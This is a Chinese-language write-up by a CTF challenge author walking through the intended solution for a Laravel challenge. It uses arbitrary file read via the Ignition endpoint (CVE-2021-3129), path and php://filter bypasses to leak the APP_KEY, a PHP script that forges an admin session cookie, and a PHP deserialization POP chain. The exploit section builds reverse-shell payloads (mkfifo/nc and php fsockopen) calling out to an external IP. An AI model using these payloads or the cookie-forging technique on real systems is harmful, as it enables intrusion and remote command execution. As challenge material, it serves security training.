出题——这关难不倒你算炸单

前言

这次出题采取任意文件读取漏洞 + Laravel 框架结合版,算是基于任意文件读取的最后一舞

本意让选手学会在不同复杂的场景下,利用任意文件读取漏洞扩大危害

Laravel 框架全球使用占比约 64%,另外两个则是 WordPress(25%)、Symfony(23%)

Symfony 框架国内不用,WordPress 现成的靶机(VulnHub)也都有,所以采用 Laravel 框架出题

信息收集

访问页面

观察 URL 发现该站点采用的路由模式,大概率使用的现成框架

页面没啥功能点可测试,注册一个账号试试

查看 Cookie 发现两个字段,laravel_session 以及 XSRF-TOKEN

直接实锤了使用的 Laravel 框架开发

任意文件读取

/_ignition/execute-solution(filter + 双写绕过)

搜索历史漏洞,找到一个 CVE-2021-3129

参考漏洞复现博客:https://www.cnblogs.com/xiaoyunxiaogang/p/16913350.html

阅读完文章发现次漏洞点是基于报错产生的,博客中的报错是:未指定应用程序的 APP_KEY 加密密钥

所以我们不妨切换下思路,手动构造一个报错看看能否跳转到相似的页面上去

URL 中添加错误路由访问,果然跳转到了相似的页面,接口都是一样的

根据页面回显的接口测试数据构造数据包

viewFile 根据字段名推测是要填入文件名,索性填一个 Laravel 环境配置文件 .env 试试

一般入口文件和 .env 都在根目录下,或者入口文件在 /public/

文件不可读取或不存在,使用双写绕过试试

1
....//.env

这次响应不一样了,说是检测到响应中有敏感内容

既然后端检测文件中的内容,那么肯定是对敏感的关键字进行检测了,如 passwd 之类的

我们这里可以采用 PHP 伪协议 php://filter 对其 Base64 编码输出

1
php://filter/read=convert.base64-encode/resource=....//.env

解码拿到 APP_KEY

1
base64:Nxxpbkj/QV1f+5uICIZjdf4rG93Dq7gVQbHNOulFxxQ=

继续扩大危害,尝试读取数据库配置文件 config/database.php

拿到数据库用户名以及一个假的 flag 值

继续读取其框架的日志文件 storage/logs/laravel.log

解码后发现有一个文件的文件名不对劲

尝试去读取文件源代码回显无权限

越权

编写脚本生成 admin260117 用户的 Cookie 去访问

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
$appKeyStr = 'base64:Nxxpbkj/QV1f+5uICIZjdf4rG93Dq7gVQbHNOulFxxQ=';
$key = base64_decode(substr($appKeyStr, 7));

$cookieName = 'laravel_session';
$cookieValue = 'admin260117';

// Laravel 的 EncryptCookies 中间件会校验基于 cookie 名称生成的 HMAC
$hash = hash_hmac('sha1', $cookieName . 'v2', $key);
$valueToEncrypt = $hash . '|' . $cookieValue;

$cipher = 'AES-256-CBC';
$iv = random_bytes(openssl_cipher_iv_length($cipher));

// Laravel 默认会对明文进行 serialize 序列化
$value = \openssl_encrypt(serialize($valueToEncrypt), $cipher, $key, 0, $iv);
$iv = base64_encode($iv);
$mac = hash_hmac('sha256', $iv.$value, $key);

$json = json_encode(compact('iv', 'value', 'mac'));
$forgedCookie = base64_encode($json);

echo "Forged Cookie: " . urlencode($forgedCookie) . "\n";
?>

得到

1
laravel_session=eyJpdiI6Ild0Z2pqbG1MTHExTm1VeWZhSTE2M1E9PSIsInZhbHVlIjoidEZadHV6cjZNRXpvMUY5TFhpNFJ1aHcxOXBjN0pHRTh3TFRSQlwvQ283K045aXFhNFlrdUlYT1JwODZUSnV6QUM4QTZweTZkcHJUMDNrRmE1VkdKOUl3PT0iLCJtYWMiOiI4OTRmYzQ1ZmFiODRmYTc1YjgzM2IzOTNhN2YwMGNkMDkxZWJjM2MyMTQ4ZGJlZDk0MGI0M2QxODg2NzBjZjljIn0%3D

成功拿到文件源代码,发现是 PHP 反序列化

反序列化

POP 链

源代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
<?php

namespace App\Hidden;

// POP Chain classes

class User {
    public $profile;
    public function __destruct() {
        if ($this->profile) {
            $this->profile->show();
        }
    }
}

class Profile {
    public $db;
    public function __call($name, $arguments) {
        if ($this->db) {
            $func = $this->db;
            $func();
        }
    }
}

class Database {
    public $host;
    public function __invoke() {
        if ($this->host) {
            echo $this->host;
        }
    }
}

class Command {
    public $cmd;
    public function __toString() {
        if ($this->cmd) {
            // Blind RCE - no output
            exec($this->cmd);
        }
        return "Command Executed";
    }
}

$role = isset($_COOKIE['laravel_session']) ? $_COOKIE['laravel_session'] : null;

if (!$role) {
    die("无权限访问");
}

require __DIR__.'/../vendor/autoload.php';
$app = require_once __DIR__.'/../bootstrap/app.php';
$app->make(\Illuminate\Contracts\Console\Kernel::class)->bootstrap();

$encrypter = $app->make('encrypter');

try {
    $decrypted = $encrypter->decrypt($role, false);
    $parts = explode('|', $decrypted, 2);
    if (count($parts) === 2) {
        $role_value = $parts[1];
    } else {
        $role_value = $decrypted;
    }
} catch (\Exception $e) {
    die("无权限访问(解密失败: " . $e->getMessage() . ")");
}

if ($role_value !== 'admin260117') {
    die("无权限访问");
}


$payload = $_POST['payload'] ?? file_get_contents('php://input');
if (empty($_POST['payload']) && strpos($payload, 'payload=') === 0) {
    $payload = substr($payload, 8);
}

if (!empty($payload) && $payload !== "Welcome Admin! Please provide your payload.") { // 防止空提交被误处理
    // Suppress errors and unserialize
    @unserialize(base64_decode($payload));
    echo "Deserialization triggered.";
} else {
    echo "Welcome Admin! Please provide your payload.";
}

分析 POP 链调用过程:

  • User::__destruct() 触发 $this->profile->show()
  • 由于 Profile 类没有 show() 方法,触发 Profile::__call()
  • Profile::__call()$this->db 作为函数调用:$func()
  • 如果 $this->dbDatabase 对象,将其作为函数调用会触发 Database::__invoke()
  • Database::__invoke() 执行 echo $this->host
  • 如果 $this->hostCommand 对象,将其作为字符串输出会触发 Command::__toString()
  • Command::__toString() 中调用了 exec($this->cmd) 造成无回显命令执行

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
<?php
namespace App\Hidden;

class User {
    public $profile;
}

class Profile {
    public $db;
}

class Database {
    public $host;
}

class Command {
    public $cmd;
}

// 1. 使用 Alpine 默认自带的 mkfifo 和 nc 反弹 ash (BusyBox sh)
$cmd_nc = "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 113.45.17.228 8989 >/tmp/f";
$c1 = new Command();
$c1->cmd = $cmd_nc;
$d1 = new Database();
$d1->host = $c1;
$p1 = new Profile();
$p1->db = $d1;
$u1 = new User();
$u1->profile = $p1;

// 2. 使用 PHP 原生 CLI 命令直接反弹
$cmd_php = "php -r '\$sock=fsockopen(\"113.45.17.228\",8989);exec(\"/bin/sh -i <&3 >&3 2>&3\");'";
$c2 = new Command();
$c2->cmd = $cmd_php;
$d2 = new Database();
$d2->host = $c2;
$p2 = new Profile();
$p2->db = $d2;
$u2 = new User();
$u2->profile = $p2;

echo "--- Payload 1 (mkfifo + nc) ---\n";
echo base64_encode(serialize($u1)) . "\n\n";

echo "--- Payload 2 (php-cli) ---\n";
echo base64_encode(serialize($u2)) . "\n";

最后也是成功 RCE